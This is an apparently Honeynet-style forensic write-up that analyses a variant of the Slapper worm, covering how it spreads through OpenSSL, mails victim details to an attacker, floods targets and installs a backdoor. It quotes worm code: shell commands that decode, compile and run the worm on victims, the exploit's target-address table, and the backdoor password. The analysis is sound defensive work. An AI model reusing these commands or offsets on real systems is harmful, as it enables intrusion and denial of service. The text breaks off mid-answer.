Scan 25

Analysis of a worm source code

Skill level: Advanced

Analysis by Franck Magron
E-mail: [email protected]

Analysis performed on Linux.


md5sum .unlock  
-> a03b5be9264651ab30f2223592befb42  .unlock

sha1sum .unlock
-> 4b018cdfdbcf71ddaa789e8ecc9ed7700660021a  .unlock

Questions and Answers

1. Which is the type of the .unlock file? When was it generated?

Answer :
Opening the file in hexl-mode under emacs we can read the hex sequence
of the beginning of file.

00000000: 1f8b 0800 ...

We can now search the sequence under google and quickly find references
of .tgz files. After renaming the file as unlock.tar.gz we find out that
our hypothesis was true and that we can extract the files contained in
the archive

A timestamp is stored in gzip files and can be retrieved by the command :

export TZ=GMT; gzip -lvN unlock.tar.gz

We get the date Sep 20 10:59 (GMT Time). 

Note that the date and time depend on the timezone set on the system 
therefore it is necessary to set the timezone before calling gzip -lvN

Fixstamp gives us the complete date : Fri Sep 20 10:59:04 2002
(fixstamp can be downloaded from

We can get rid of the timezone by replacing ctime by asctime(gmtime(&stamp))
in the source code of fixstamp

2. Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?

Answer :
The date and time of the files are the following (GMT)

-rw-r--r-- root/wheel    70981 2002-09-20 13:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 21:57:48 .update.c

The file .unlock.c has a date posterior to the gzip timestamp

This could indicate that the system date has been modified between
the modification of .unlock.c and the creation of tgz archive

According to the source code, the file has been created by [email protected]
and modified by [email protected], probably under windows plateform (carriage
returns in the file)

In the archives of bugtraq on SecurityFocus site, we can find that
this is a version of Slapper Worm and (this is the .C variant according 
to the name of temporary files created by the worm - CAN-2002-0656)

According to Symantec the worm was discovered on september the 13th.

3. Which process name is used by the worm when it is running?

Answer :
The process name is httpd (same as apache): 

Line 1423 : compilation of executable file
  "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "

Line 1425-1426 : execution of worm
  sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);

The command string is passed to the shell launched by the exploit.

4. In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

Answer :
The files are transfered as uuencoded gzipped tar file.

We find it at lines 1416 to 1422 and by analyzing zhdr and
encode functions.

  writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
                "tar xzf /tmp/.unlock -C /tmp/;              "

* zhdr adds the gzip header
* encode uuencodes /tmp/.unlock file 

(the code of encode function comes from uuencode.c source)

The files which are created in the whole process are : 


The files are erased by the worm (line 1427)

 writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "

The worm scans HTTP port (port 80)

Line 67   : #define SCANPORT 80
Line 1923 : atcp_sync_connect(&clients[n],srv,SCANPORT);

The address of the client is determined at random within declared /8 (line 291)
If the scan is succesful (atcp_sync_check return ASUCCESS on line 1927) then
the worm tries the exploit on port 443 (line 1933)

The port 443 (HTTPS) is used for the exploit (line 1698)

6. Which vulnerability the worm tries to exploit? In which architectures?

Answer :
The worm tries to exploit OpenSSL vulnerabilities as we can find on 
lines 1697 to 1762. 

Advisory CA-2002-23

Searching Google for the keywords bkbk and exploit, you get
the original exploit code released on securitybugware

The exploit is for various Linux plateforms as we find on lines 1245 to 1269

architectures[] = {
	{"Gentoo", "", 0x08086c34},
	{"Debian", "1.3.26", 0x080863cc},
	{"Red-Hat", "1.3.6", 0x080707ec},
	{"Red-Hat", "1.3.9", 0x0808ccc4},
	{"Red-Hat", "1.3.12", 0x0808f614},
	{"Red-Hat", "1.3.12", 0x0809251c},
	{"Red-Hat", "1.3.19", 0x0809af8c},
	{"Red-Hat", "1.3.20", 0x080994d4},
	{"Red-Hat", "1.3.26", 0x08161c14},
	{"Red-Hat", "1.3.23", 0x0808528c},
	{"Red-Hat", "1.3.22", 0x0808400c},
	{"SuSE", "1.3.12", 0x0809f54c},
	{"SuSE", "1.3.17", 0x08099984},
	{"SuSE", "1.3.19", 0x08099ec8},
	{"SuSE", "1.3.20", 0x08099da8},
	{"SuSE", "1.3.23", 0x08086168},
	{"SuSE", "1.3.23", 0x080861c8},
	{"Mandrake", "1.3.14", 0x0809d6c4},
	{"Mandrake", "1.3.19", 0x0809ea98},
	{"Mandrake", "1.3.20", 0x0809e97c},
	{"Mandrake", "1.3.23", 0x08086580},
	{"Slackware", "1.3.26", 0x083d37fc},
	{"Slackware", "1.3.26",0x080b2100}

7. What kind of information is sent by the worm by email? To which account?

Answer :
Mail sent to [email protected] after connecting to the server

The info sent is the hostid, hostname of victim machine
and address ip of the parent machine (sip, which is the 
argument passed to the program)

Lines 122-124

  sprintf(cmdbuf," hostid:   %d \r\n"
                 " hostname: %s \r\n"
		 " att_from: %s \r\n",gethostid(),buffer,sip);  

This part has been added to aion according to the comments (line 1801)
where we find the call to mailme

8. Which port (and protocol) is used by the worm to communicate to other infected machines?

Answer :
The worm communicates with other infected machines via port UDP (port 4156)
as we can see on lines 877 to 921

9. Name 3 functionalities built in the worm to attack other networks.

Answer :
Some of the built in functionalities to attack other networks are :

Distributed Denials of Service :

  UDP flood (lines 2205-2245)
  - Flooding by sending strings of rp->size bytes (line 2235)
  - Targets rp->port or random port if rp->port==0 (line 2229)
  - Flood for rp->secs seconds

  TCP flood (lines 2246-2277)
  - Connect and immediate close (lines 2268-2269)
  - Targets rp->port or random port if rp->port==0
  - Flood for rp->secs seconds
  IPv6 TCP flood (lines 2279-2306)
  - Connect and immediate close (lines 2297-2298)
  - Targets rp->port or random port if rp->port==0
  - Flood for rp->secs seconds

  DNS flood (lines 2308-2385)
  - DNS queries
  - Flood for rp->secs seconds

Scan :

  Email scan (lines 2386-2409)

10. What is the purpose of the .update.c program? Which port does it use?

Answer :
This is a backdoor which executes shell commands when receiving the password
aion1981 on the port 1052

The code of .update.c is straightforward.

11. Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

Answer :
The purpose of these two values is to make the daemon more difficult to
detect on the victim machine. The daemon sleeps most of the time and
as it does not listen on any port, you don't see it when you use lsof.

lsof |grep LISTEN

The drawback for the attacker is that he has only an UPTIME time window
to connect to the victim machine so he has to try many times before